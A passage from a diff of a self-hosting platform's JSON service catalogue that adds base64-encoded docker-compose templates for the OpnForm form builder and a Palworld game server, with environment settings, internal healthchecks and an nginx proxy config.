iAnJHtTRVJWSUNFX0JBU0U2NF9BUElLRVl9JwogICAgICBBUFBfREVCVUc6ICcke0FQUF9ERUJVRzotZmFsc2V9JwogICAgICBBUFBfVVJMOiAnJHtTRVJWSUNFX0ZRRE5fTkdJTlh9JwogICAgICBMT0dfQ0hBTk5FTDogZXJyb3Jsb2cKICAgICAgTE9HX0xFVkVMOiAnJHtMT0dfTEVWRUw6LWRlYnVnfScKICAgICAgRklMRVNZU1RFTV9EUklWRVI6ICcke0ZJTEVTWVNURU1fRFJJVkVSOi1sb2NhbH0nCiAgICAgIExPQ0FMX0ZJTEVTWVNURU1fVklTSUJJTElUWTogcHVibGljCiAgICAgIENBQ0hFX0RSSVZFUjogcmVkaXMKICAgICAgUVVFVUVfQ09OTkVDVElPTjogcmVkaXMKICAgICAgU0VTU0lPTl9EUklWRVI6IHJlZGlzCiAgICAgIFNFU1NJT05fTElGRVRJTUU6IDEyMAogICAgICBNQUlMX01BSUxFUjogJyR7TUFJTF9NQUlMRVI6LWxvZ30nCiAgICAgIE1BSUxfSE9TVDogJyR7TUFJTF9IT1NUfScKICAgICAgTUFJTF9QT1JUOiAnJHtNQUlMX1BPUlR9JwogICAgICBNQUlMX1VTRVJOQU1FOiAnJHtNQUlMX1VTRVJOQU1FOi15b3VyQGVtYWlsLmNvbX0nCiAgICAgIE1BSUxfUEFTU1dPUkQ6ICcke01BSUxfUEFTU1dPUkR9JwogICAgICBNQUlMX0VOQ1JZUFRJT046ICcke01BSUxfRU5DUllQVElPTn0nCiAgICAgIE1BSUxfRlJPTV9BRERSRVNTOiAnJHtNQUlMX0ZST01fQUREUkVTUzoteW91ckBlbWFpbC5jb219JwogICAgICBNQUlMX0ZST01fTkFNRTogJyR7TUFJTF9GUk9NX05BTUU6LU9wbkZvcm19JwogICAgICBBV1NfQUNDRVNTX0tFWV9JRDogJyR7QVdTX0FDQ0VTU19LRVlfSUR9JwogICAgICBBV1NfU0VDUkVUX0FDQ0VTU19LRVk6ICcke0FXU19TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIEFXU19ERUZBVUxUX1JFR0lPTjogJyR7QVdTX0RFRkFVTFRfUkVHSU9OOi11cy1lYXN0LTF9JwogICAgICBBV1NfQlVDS0VUOiAnJHtBV1NfQlVDS0VUfScKICAgICAgT1BFTl9BSV9BUElfS0VZOiAnJHtPUEVOX0FJX0FQSV9LRVl9JwogICAgICBURUxFR1JBTV9CT1RfSUQ6ICcke1RFTEVHUkFNX0JPVF9JRH0nCiAgICAgIFRFTEVHUkFNX0JPVF9UT0tFTjogJyR7VEVMRUdSQU1fQk9UX1RPS0VOfScKICAgICAgUkVESVNfSE9TVDogcmVkaXMKICAgICAgUkVESVNfUEFTU1dPUkQ6ICcke1NFUlZJQ0VfUEFTU1dPUkRfNjRfUkVESVN9JwogICAgICBEQl9IT1NUOiBwb3N0Z3Jlc3FsCiAgICAgIERCX0RBVEFCQVNFOiAnJHtQT1NUR1JFU1FMX0RBVEFCQVNFOi1vcG5mb3JtfScKICAgICAgREJfVVNFUk5BTUU6ICcke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU1FMfScKICAgICAgREJfUEFTU1dPUkQ6ICcke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVNRTH0nCiAgICAgIERCX0NPTk5FQ1RJT046IHBnc3FsCiAgICAgIFBIUF9NRU1PUllfTElNSVQ6IDFHCiAgICAgIFBIUF9NQVhfRVhFQ1VUSU9OX1RJTUU6ICc2MDAnCiAgICAgIFBIUF9VUExPQURfTUFYX0ZJTEVTSVpFOiA2NE0KICAgICAgUEhQX1BPU1RfTUFYX1NJWkU6IDY0TQogICAgY29tbWFuZDoKICAgICAgLSBwaHAKICAgICAgLSBhcnRpc2FuCiAgICAgIC0gJ3F1ZXVlOndvcmsnCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3Jlc3FsOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gInBncmVwIC1mICdwaHAgYXJ0aXNhbiBxdWV1ZTp3b3JrJyA+IC9kZXYvbnVsbCB8fCBleGl0IDEiCiAgICAgIGludGVydmFsOiA2MHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMKICAgICAgc3RhcnRfcGVyaW9kOiAzMHMKICBhcGktc2NoZWR1bGVyOgogICAgaW1hZ2U6ICdqaHVtYW5qL29wbmZvcm0tYXBpOjEuMTIuMScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2FwaS1zdG9yYWdlOi91c3Ivc2hhcmUvbmdpbngvaHRtbC9zdG9yYWdlJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIEFQUF9OQU1FOiBPcG5Gb3JtCiAgICAgIEFQUF9FTlY6IHByb2R1Y3Rpb24KICAgICAgQVBQX0tFWTogJyR7U0VSVklDRV9CQVNFNjRfQVBJS0VZfScKICAgICAgQVBQX0RFQlVHOiAnJHtBUFBfREVCVUc6LWZhbHNlfScKICAgICAgQVBQX1VSTDogJyR7U0VSVklDRV9GUUROX05HSU5YfScKICAgICAgTE9HX0NIQU5ORUw6IGVycm9ybG9nCiAgICAgIExPR19MRVZFTDogJyR7TE9HX0xFVkVMOi1kZWJ1Z30nCiAgICAgIEZJTEVTWVNURU1fRFJJVkVSOiAnJHtGSUxFU1lTVEVNX0RSSVZFUjotbG9jYWx9JwogICAgICBMT0NBTF9GSUxFU1lTVEVNX1ZJU0lCSUxJVFk6IHB1YmxpYwogICAgICBDQUNIRV9EUklWRVI6IHJlZGlzCiAgICAgIFFVRVVFX0NPTk5FQ1RJT046IHJlZGlzCiAgICAgIFNFU1NJT05fRFJJVkVSOiByZWRpcwogICAgICBTRVNTSU9OX0xJRkVUSU1FOiAxMjAKICAgICAgTUFJTF9NQUlMRVI6ICcke01BSUxfTUFJTEVSOi1sb2d9JwogICAgICBNQUlMX0hPU1Q6ICcke01BSUxfSE9TVH0nCiAgICAgIE1BSUxfUE9SVDogJyR7TUFJTF9QT1JUfScKICAgICAgTUFJTF9VU0VSTkFNRTogJyR7TUFJTF9VU0VSTkFNRToteW91ckBlbWFpbC5jb219JwogICAgICBNQUlMX1BBU1NXT1JEOiAnJHtNQUlMX1BBU1NXT1JEfScKICAgICAgTUFJTF9FTkNSWVBUSU9OOiAnJHtNQUlMX0VOQ1JZUFRJT059JwogICAgICBNQUlMX0ZST01fQUREUkVTUzogJyR7TUFJTF9GUk9NX0FERFJFU1M6LXlvdXJAZW1haWwuY29tfScKICAgICAgTUFJTF9GUk9NX05BTUU6ICcke01BSUxfRlJPTV9OQU1FOi1PcG5Gb3JtfScKICAgICAgQVdTX0FDQ0VTU19LRVlfSUQ6ICcke0FXU19BQ0NFU1NfS0VZX0lEfScKICAgICAgQVdTX1NFQ1JFVF9BQ0NFU1NfS0VZOiAnJHtBV1NfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICBBV1NfREVGQVVMVF9SRUdJT046ICcke0FXU19ERUZBVUxUX1JFR0lPTjotdXMtZWFzdC0xfScKICAgICAgQVdTX0JVQ0tFVDogJyR7QVdTX0JVQ0tFVH0nCiAgICAgIE9QRU5fQUlfQVBJX0tFWTogJyR7T1BFTl9BSV9BUElfS0VZfScKICAgICAgVEVMRUdSQU1fQk9UX0lEOiAnJHtURUxFR1JBTV9CT1RfSUR9JwogICAgICBURUxFR1JBTV9CT1RfVE9LRU46ICcke1RFTEVHUkFNX0JPVF9UT0tFTn0nCiAgICAgIFJFRElTX0hPU1Q6IHJlZGlzCiAgICAgIFJFRElTX1BBU1NXT1JEOiAnJHtTRVJWSUNFX1BBU1NXT1JEXzY0X1JFRElTfScKICAgICAgREJfSE9TVDogcG9zdGdyZXNxbAogICAgICBEQl9EQVRBQkFTRTogJyR7UE9TVEdSRVNRTF9EQVRBQkFTRTotb3BuZm9ybX0nCiAgICAgIERCX1VTRVJOQU1FOiAnJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVNRTH0nCiAgICAgIERCX1BBU1NXT1JEOiAnJHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTUUx9JwogICAgICBEQl9DT05ORUNUSU9OOiBwZ3NxbAogICAgICBQSFBfTUVNT1JZX0xJTUlUOiAxRwogICAgICBQSFBfTUFYX0VYRUNVVElPTl9USU1FOiAnNjAwJwogICAgICBQSFBfVVBMT0FEX01BWF9GSUxFU0laRTogNjRNCiAgICAgIFBIUF9QT1NUX01BWF9TSVpFOiA2NE0KICAgIGNvbW1hbmQ6CiAgICAgIC0gcGhwCiAgICAgIC0gYXJ0aXNhbgogICAgICAtICdzY2hlZHVsZTp3b3JrJwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXNxbDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwaHAgL3Vzci9zaGFyZS9uZ2lueC9odG1sL2FydGlzYW4gYXBwOnNjaGVkdWxlci1zdGF0dXMgLS1tb2RlPWNoZWNrIC0tbWF4LW1pbnV0ZXM9MyB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiA2MHMKICAgICAgdGltZW91dDogMzBzCiAgICAgIHJldHJpZXM6IDMKICAgICAgc3RhcnRfcGVyaW9kOiA3MHMKICBvcG5mb3JtLXVpOgogICAgaW1hZ2U6ICdqaHVtYW5qL29wbmZvcm0tY2xpZW50OjEuMTIuMScKICAgIGVudmlyb25tZW50OgogICAgICAtIE5VWFRfUFVCTElDX0FQUF9VUkw9LwogICAgICAtIE5VWFRfUFVCTElDX0FQSV9CQVNFPS9hcGkKICAgICAgLSAnTlVYVF9QUklWQVRFX0FQSV9CQVNFPWh0dHA6Ly9uZ2lueC9hcGknCiAgICAgIC0gTlVYVF9QVUJMSUNfRU5WPXByb2R1Y3Rpb24KICAgICAgLSAnTlVYVF9QVUJMSUNfSF9DQVBUQ0hBX1NJVEVfS0VZPSR7SF9DQVBUQ0hBX1NJVEVfS0VZfScKICAgICAgLSAnTlVYVF9QVUJMSUNfUkVfQ0FQVENIQV9TSVRFX0tFWT0ke1JFX0NBUFRDSEFfU0lURV9LRVl9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC0tc3BpZGVyIC1xIGh0dHA6Ly9vcG5mb3JtLXVpOjMwMDAvbG9naW4gfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogMzBzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAzCiAgICAgIHN0YXJ0X3BlcmlvZDogNDVzCiAgICBkZXBlbmRzX29uOgogICAgICBvcG5mb3JtLWFwaToKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIHBvc3RncmVzcWw6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE2JwogICAgdm9sdW1lczoKICAgICAgLSAnb3BuZm9ybS1wb3N0Z3Jlc3FsLWRhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1BPU1RHUkVTX1VTRVI9JHtTRVJWSUNFX1VTRVJfUE9TVEdSRVNRTH0nCiAgICAgIC0gJ1BPU1RHUkVTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU1FMfScKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU1FMX0RBVEFCQVNFOi1vcG5mb3JtfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICByZWRpczoKICAgIGltYWdlOiAncmVkaXM6NycKICAgIGVudmlyb25tZW50OgogICAgICAtICdSRURJU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfNjRfUkVESVN9JwogICAgdm9sdW1lczoKICAgICAgLSAncmVkaXMtZGF0YTovZGF0YScKICAgIGNvbW1hbmQ6CiAgICAgIC0gcmVkaXMtc2VydmVyCiAgICAgIC0gJy0tcmVxdWlyZXBhc3MnCiAgICAgIC0gJyR7U0VSVklDRV9QQVNTV09SRF82NF9SRURJU30nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gcmVkaXMtY2xpCiAgICAgICAgLSAnLWEnCiAgICAgICAgLSAnJHtTRVJWSUNFX1BBU1NXT1JEXzY0X1JFRElTfScKICAgICAgICAtIFBJTkcKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiAzMHMKICAgICAgcmV0cmllczogMwogIG5naW54OgogICAgaW1hZ2U6ICduZ2lueDoxLjI5LjInCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fTkdJTlgKICAgIHZvbHVtZXM6CiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL25naW54L25naW54LmNvbmYKICAgICAgICB0YXJnZXQ6IC9ldGMvbmdpbngvY29uZi5kL2RlZmF1bHQuY29uZgogICAgICAgIHJlYWRfb25seTogdHJ1ZQogICAgICAgIGNvbnRlbnQ6ICJtYXAgJG9yaWdpbmFsX3VyaSAkYXBpX3VyaSB7XG4gICAgfl4vYXBpKC8uKiQpICQxO1xuICAgIGRlZmF1bHQgJG9yaWdpbmFsX3VyaTtcbn1cblxuc2VydmVyIHtcbiAgICBsaXN0ZW4gODAgZGVmYXVsdF9zZXJ2ZXI7XG4gICAgcm9vdCAvdXNyL3NoYXJlL25naW54L2h0bWwvcHVibGljO1xuXG4gICAgYWNjZXNzX2xvZyAvZGV2L3N0ZG91dDtcbiAgICBlcnJvcl9sb2cgL2Rldi9zdGRlcnIgZXJyb3I7XG5cbiAgICBpbmRleCBpbmRleC5odG1sIGluZGV4Lmh0bSBpbmRleC5waHA7XG5cbiAgICBsb2NhdGlvbiAvIHtcbiAgICAgICAgcHJveHlfaHR0cF92ZXJzaW9uIDEuMTtcbiAgICAgICAgcHJveHlfcGFzcyBodHRwOi8vb3BuZm9ybS11aTozMDAwO1xuICAgICAgICBwcm94eV9zZXRfaGVhZGVyIFgtUmVhbC1JUCAkcmVtb3RlX2FkZHI7XG4gICAgICAgIHByb3h5X3NldF9oZWFkZXIgWC1Gb3J3YXJkZWQtSG9zdCAkaG9zdDtcbiAgICAgICAgcHJveHlfc2V0X2hlYWRlciBYLUZvcndhcmRlZC1Qb3J0ICRzZXJ2ZXJfcG9ydDtcbiAgICAgICAgcHJveHlfc2V0X2hlYWRlciBVcGdyYWRlICRodHRwX3VwZ3JhZGU7XG4gICAgICAgIHByb3h5X3NldF9oZWFkZXIgQ29ubmVjdGlvbiBcIlVwZ3JhZGVcIjtcbiAgICB9XG5cbiAgICBsb2NhdGlvbiB+LyhhcGl8b3Blbnxsb2NhbFxcL3RlbXB8Zm9ybXNcXC9hc3NldHMpLyB7XG4gICAgICAgIHNldCAkb3JpZ2luYWxfdXJpICR1cmk7XG4gICAgICAgIHRyeV9maWxlcyAkdXJpICR1cmkvIC9pbmRleC5waHAkaXNfYXJncyRhcmdzO1xuICAgIH1cblxuICAgIGxvY2F0aW9uIH4gXFwucGhwJCB7XG4gICAgICAgIGZhc3RjZ2lfc3BsaXRfcGF0aF9pbmZvIF4oLitcXC5waHApKC8uKykkO1xuICAgICAgICBmYXN0Y2dpX3Bhc3Mgb3BuZm9ybS1hcGk6OTAwMDtcbiAgICAgICAgZmFzdGNnaV9pbmRleCBpbmRleC5waHA7XG4gICAgICAgIGluY2x1ZGUgZmFzdGNnaV9wYXJhbXM7XG4gICAgICAgIGZhc3RjZ2lfcGFyYW0gU0NSSVBUX0ZJTEVOQU1FIC91c3Ivc2hhcmUvbmdpbngvaHRtbC9wdWJsaWMvaW5kZXgucGhwO1xuICAgICAgICBmYXN0Y2dpX3BhcmFtIFJFUVVFU1RfVVJJICRhcGlfdXJpO1xuICAgIH1cbn0iCiAgICBkZXBlbmRzX29uOgogICAgICAtIG9wbmZvcm0tYXBpCiAgICAgIC0gb3BuZm9ybS11aQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIG5naW54CiAgICAgICAgLSAnLXQnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMKICAgICAgc3RhcnRfcGVyaW9kOiA0MHMK", + "tags": [ + "opnform", + "form", + "survey", + "cloud", + "open-source", + "self-hosted", + "docker", + "no-code", + "embeddable" + ], + "category": null, + "logo": "svg/opnform.svg", + "minversion": "0.0.0", + "port": "80" + }, "orangehrm": { "documentation": "https://starterhelp.orangehrm.com/hc/en-us?utm_source=coolify.io", "slogan": "OrangeHRM open source HR management software.", @@ -3145,6 +3179,15 @@ "minversion": "0.0.0", "port": "3000" }, + "palworld": { + "documentation": "https://coolify.io/docs", + "slogan": "Palworld.yaml", + "compose": "c2VydmljZXM6CiAgcGFsd29ybGQ6CiAgICBpbWFnZTogJ3RoaWpzdmFubG9lZi9wYWx3b3JsZC1zZXJ2ZXItZG9ja2VyOnYxLjQuNicKICAgIHN0b3BfZ3JhY2VfcGVyaW9kOiAzMHMKICAgIHBvcnRzOgogICAgICAtICc4MjExOjgyMTEvdWRwJwogICAgICAtICcyNzAxNToyNzAxNS91ZHAnCiAgICB2b2x1bWVzOgogICAgICAtICdwYWx3b3JsZC1kYXRhOi9wYWx3b3JsZC8nCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnVFo9JHtUWjo/VVRDfScKICAgICAgLSAnUFVJRD0ke1BVSUQ6PzEwMDB9JwogICAgICAtICdQR0lEPSR7UEdJRDo/MTAwMH0nCiAgICAgIC0gJ01VTFRJVEhSRUFESU5HPSR7TVVMVElUSFJFQURJTkc6P2ZhbHNlfScKICAgICAgLSAnTUFYX1BMQVlFUlM9JHtQTEFZRVJTOj8xNn0nCiAgICAgIC0gJ1NFUlZFUl9OQU1FPSR7U0VSVkVSX05BTUU6P3BhbHdvcmxkLXNlcnZlci1kb2NrZXIgYnkgVGhpanMgdmFuIExvZWYgdmlhIENvb2xpZnl9JwogICAgICAtICdTRVJWRVJfREVTQ1JJUFRJT049JHtTRVJWRVJfREVTQ1JJUFRJT046P3BhbHdvcmxkLXNlcnZlci1kb2NrZXIgYnkgVGhpanMgdmFuIExvZWYgdmlhIENvb2xpZnl9JwogICAgICAtICdTRVJWRVJfUEFTU1dPUkQ9JHtTRVJWRVJfUEFTU1dPUkQ6P3dvcmxkb2ZwYWxzfScKICAgICAgLSAnQURNSU5fUEFTU1dPUkQ9JHtBRE1JTl9QQVNTV09SRDotYWRtaW5QYXNzd29yZH0nCiAgICAgIC0gJ0NPTU1VTklUWT0ke0NPTU1VTklUWTo/ZmFsc2V9JwogICAgICAtICdQVUJMSUNfSVA9JHtQVUJMSUNfSVA6LX0nCiAgICAgIC0gJ1BVQkxJQ19QT1JUPSR7UFVCTElDX1BPUlQ6PzgyMTF9JwogICAgICAtICdQT1JUPSR7UE9SVDo/ODIxMX0nCiAgICAgIC0gJ1FVRVJZX1BPUlQ9JHtRVUVSWV9QT1JUOj8yNzAxNX0nCiAgICAgIC0gJ1VQREFURV9PTl9CT09UPSR7VVBEQVRFX09OX0JPT1Q6P3RydWV9JwogICAgICAtICdSQ09OX0VOQUJMRUQ9JHtSQ09OX0VOQUJMRUQ6P3RydWV9JwogICAgICAtICdSQ09OX1BPUlQ9JHtSQ09OX1BPUlQ6PzI1NTc1fScKICAgICAgLSAnQkFDS1VQX0VOQUJMRUQ9JHtCQUNLVVBfRU5BQkxFRDo/dHJ1ZX0nCiAgICAgIC0gJ0RFTEVURV9PTERfQkFDS1VQUz0ke0RFTEVURV9PTERfQkFDS1VQUzo/ZmFsc2V9JwogICAgICAtICdPTERfQkFDS1VQX0RBWVM9JHtPTERfQkFDS1VQX0RBWVM6PzMwfScKICAgICAgLSAnQkFDS1VQX0NST05fRVhQUkVTU0lPTj0ke0JBQ0tVUF9DUk9OX0VYUFJFU1NJT046PzAgMCAqICogKn0nCiAgICAgIC0gJ0FVVE9fVVBEQVRFX0VOQUJMRUQ9JHtBVVRPX1VQREFURV9FTkFCTEVEOj9mYWxzZX0nCiAgICAgIC0gJ0FVVE9fVVBEQVRFX0NST05fRVhQUkVTU0lPTj0ke0FVVE9fVVBEQVRFX0NST05fRVhQUkVTU0lPTjo/MCAqICogKiAqfScKICAgICAgLSAnQVVUT19VUERBVEVfV0FSTl9NSU5VVEVTPSR7QVVUT19VUERBVEVfV0FSTl9NSU5VVEVTOj8zMH0nCiAgICAgIC0gJ0FVVE9fUkVCT09UX0VOQUJMRUQ9JHtBVVRPX1JFQk9PVF9FTkFCTEVEOj9mYWxzZX0nCiAgICAgIC0gJ0FVVE9fUkVCT09UX0VWRU5fSUZfUExBWUVSU19PTkxJTkU9JHtBVVRPX1JFQk9PVF9FVkVOX0lGX1BMQVlFUlNfT05MSU5FOj9mYWxzZX0nCiAgICAgIC0gJ0FVVE9fUkVCT09UX1dBUk5fTUlOVVRFUz0ke0FVVE9fUkVCT09UX1dBUk5fTUlOVVRFUzo/NX0nCiAgICAgIC0gJ0FVVE9fUkVCT09UX0NST05fRVhQUkVTU0lPTj0ke0FVVE9fUkVCT09UX0NST05fRVhQUkVTU0lPTjo/MCAwICogKiAqfScKICAgICAgLSAnQVVUT19QQVVTRV9FTkFCTEVEPSR7QVVUT19QQVVTRV9FTkFCTEVEOj9mYWxzZX0nCiAgICAgIC0gJ0FVVE9fUEFVU0VfVElNRU9VVF9FU1Q9JHtBVVRPX1BBVVNFX1RJTUVPVVRfRVNUOj8xODB9JwogICAgICAtICdBVVRPX1BBVVNFX0xPRz0ke0FVVE9fUEFVU0VfTE9HOj90cnVlfScKICAgICAgLSAnQVVUT19QQVVTRV9ERUJVRz0ke0FVVE9fUEFVU0VfREVCVUc6P2ZhbHNlfScKICAgICAgLSAnRU5BQkxFX1BMQVlFUl9MT0dHSU5HPSR7RU5BQkxFX1BMQVlFUl9MT0dHSU5HOj90cnVlfScKICAgICAgLSAnUExBWUVSX0xPR0dJTkdfUE9MTF9QRVJJT0Q9JHtQTEFZRVJfTE9HR0lOR19QT0xMX1BFUklPRDo/NX0nCiAgICAgIC0gJ0RJRkZJQ1VMVFk9JHtESUZGSUNVTFRZOj9Ob25lfScKICAgICAgLSAnUkFORE9NSVpFUl9UWVBFPSR7UkFORE9NSVpFUl9UWVBFOi19JwogICAgICAtICdSQU5ET01JWkVSX1NFRUQ9JHtSQU5ET01JWkVSX1NFRUQ6P25vbmV9JwogICAgICAtICdEQVlUSU1FX1NQRUVEUkFURT0ke0RBWVRJTUVfU1BFRURSQVRFOj8xLjAwMDAwMH0nCiAgICAgIC0gJ05JR0hUVElNRV9TUEVFRFJBVEU9JHtOSUdIVFRJTUVfU1BFRURSQVRFOj8xLjAwMDAwMH0nCiAgICAgIC0gJ0VYUF9SQVRFPSR7RVhQX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnUEFMX0NBUFRVUkVfUkFURT0ke1BBTF9DQVBUVVJFX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnUEFMX1NQQVdOX05VTV9SQVRFPSR7UEFMX1NQQVdOX05VTV9SQVRFOj8xLjAwMDAwMH0nCiAgICAgIC0gJ1BBTF9EQU1BR0VfUkFURV9BVFRBQ0s9JHtQQUxfREFNQUdFX1JBVEVfQVRUQUNLOj8xLjAwMDAwMH0nCiAgICAgIC0gJ1BBTF9EQU1BR0VfUkFURV9ERUZFTlNFPSR7UEFMX0RBTUFHRV9SQVRFX0RFRkVOU0U6PzEuMDAwMDAwfScKICAgICAgLSAnUExBWUVSX0RBTUFHRV9SQVRFX0FUVEFDSz0ke1BMQVlFUl9EQU1BR0VfUkFURV9BVFRBQ0s6PzEuMDAwMDAwfScKICAgICAgLSAnUExBWUVSX0RBTUFHRV9SQVRFX0RFRkVOU0U9JHtQTEFZRVJfREFNQUdFX1JBVEVfREVGRU5TRTo/MS4wMDAwMDB9JwogICAgICAtICdQTEFZRVJfU1RPTUFDSF9ERUNSRUFTRV9SQVRFPSR7UExBWUVSX1NUT01BQ0hfREVDUkVBU0VfUkFURTo/MS4wMDAwMDB9JwogICAgICAtICdQTEFZRVJfU1RBTUlOQV9ERUNSRUFTRV9SQVRFPSR7UExBWUVSX1NUQU1JTkFfREVDUkVBU0VfUkFURTo/MS4wMDAwMDB9JwogICAgICAtICdQTEFZRVJfQVVUT19IUF9SRUdFTl9SQVRFPSR7UExBWUVSX0FVVE9fSFBfUkVHRU5fUkFURTo/MS4wMDAwMDB9JwogICAgICAtICdQTEFZRVJfQVVUT19IUF9SRUdFTl9SQVRFX0lOX1NMRUVQPSR7UExBWUVSX0FVVE9fSFBfUkVHRU5fUkFURV9JTl9TTEVFUDo/MS4wMDAwMDB9JwogICAgICAtICdQQUxfU1RPTUFDSF9ERUNSRUFTRV9SQVRFPSR7UEFMX1NUT01BQ0hfREVDUkVBU0VfUkFURTo/MS4wMDAwMDB9JwogICAgICAtICdQQUxfU1RBTUlOQV9ERUNSRUFTRV9SQVRFPSR7UEFMX1NUQU1JTkFfREVDUkVBU0VfUkFURTo/MS4wMDAwMDB9JwogICAgICAtICdQQUxfQVVUT19IUF9SRUdFTl9SQVRFPSR7UEFMX0FVVE9fSFBfUkVHRU5fUkFURTo/MS4wMDAwMDB9JwogICAgICAtICdQQUxfQVVUT19IUF9SRUdFTl9SQVRFX0lOX1NMRUVQPSR7UEFMX0FVVE9fSFBfUkVHRU5fUkFURV9JTl9TTEVFUDo/MS4wMDAwMDB9JwogICAgICAtICdCVUlMRF9PQkpFQ1RfSFBfUkFURT0ke0JVSUxEX09CSkVDVF9IUF9SQVRFOj8xLjAwMDAwMH0nCiAgICAgIC0gJ0JVSUxEX09CSkVDVF9EQU1BR0VfUkFURT0ke0JVSUxEX09CSkVDVF9EQU1BR0VfUkFURTo/MS4wMDAwMDB9JwogICAgICAtICdCVUlMRF9PQkpFQ1RfREVURVJJT1JBVElPTl9EQU1BR0VfUkFURT0ke0JVSUxEX09CSkVDVF9ERVRFUklPUkFUSU9OX0RBTUFHRV9SQVRFOj8xLjAwMDAwMH0nCiAgICAgIC0gJ0NPTExFQ1RJT05fRFJPUF9SQVRFPSR7Q09MTEVDVElPTl9EUk9QX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnQ09MTEVDVElPTl9PQkpFQ1RfSFBfUkFURT0ke0NPTExFQ1RJT05fT0JKRUNUX0hQX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnQ09MTEVDVElPTl9PQkpFQ1RfUkVTUEFXTl9TUEVFRF9SQVRFPSR7Q09MTEVDVElPTl9PQkpFQ1RfUkVTUEFXTl9TUEVFRF9SQVRFOj8xLjAwMDAwMH0nCiAgICAgIC0gJ0VORU1ZX0RST1BfSVRFTV9SQVRFPSR7RU5FTVlfRFJPUF9JVEVNX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnREVBVEhfUEVOQUxUWT0ke0RFQVRIX1BFTkFMVFk6P0FsbH0nCiAgICAgIC0gJ0VOQUJMRV9QTEFZRVJfVE9fUExBWUVSX0RBTUFHRT0ke0VOQUJMRV9QTEFZRVJfVE9fUExBWUVSX0RBTUFHRTo/RmFsc2V9JwogICAgICAtICdFTkFCTEVfRlJJRU5ETFlfRklSRT0ke0VOQUJMRV9GUklFTkRMWV9GSVJFOj9GYWxzZX0nCiAgICAgIC0gJ0VOQUJMRV9JTlZBREVSX0VORU1ZPSR7RU5BQkxFX0lOVkFERVJfRU5FTVk6P1RydWV9JwogICAgICAtICdBQ1RJVkVfVU5LTz0ke0FDVElWRV9VTktPOj9GYWxzZX0nCiAgICAgIC0gJ0VOQUJMRV9BSU1fQVNTSVNUX1BBRD0ke0VOQUJMRV9BSU1fQVNTSVNUX1BBRDo/VHJ1ZX0nCiAgICAgIC0gJ0VOQUJMRV9BSU1fQVNTSVNUX0tFWUJPQVJEPSR7RU5BQkxFX0FJTV9BU1NJU1RfS0VZQk9BUkQ6P0ZhbHNlfScKICAgICAgLSAnRFJPUF9JVEVNX01BWF9OVU09JHtEUk9QX0lURU1fTUFYX05VTTo/MzAwMH0nCiAgICAgIC0gJ0RST1BfSVRFTV9NQVhfTlVNX1VOS089JHtEUk9QX0lURU1fTUFYX05VTV9VTktPOj8xMDB9JwogICAgICAtICdCQVNFX0NBTVBfTUFYX05VTT0ke0JBU0VfQ0FNUF9NQVhfTlVNOj8xMjh9JwogICAgICAtICdCQVNFX0NBTVBfV09SS0VSX01BWF9OVU09JHtCQVNFX0NBTVBfV09SS0VSX01BWF9OVU06PzE1fScKICAgICAgLSAnRFJPUF9JVEVNX0FMSVZFX01BWF9IT1VSUz0ke0RST1BfSVRFTV9BTElWRV9NQVhfSE9VUlM6PzEuMDAwMDAwfScKICAgI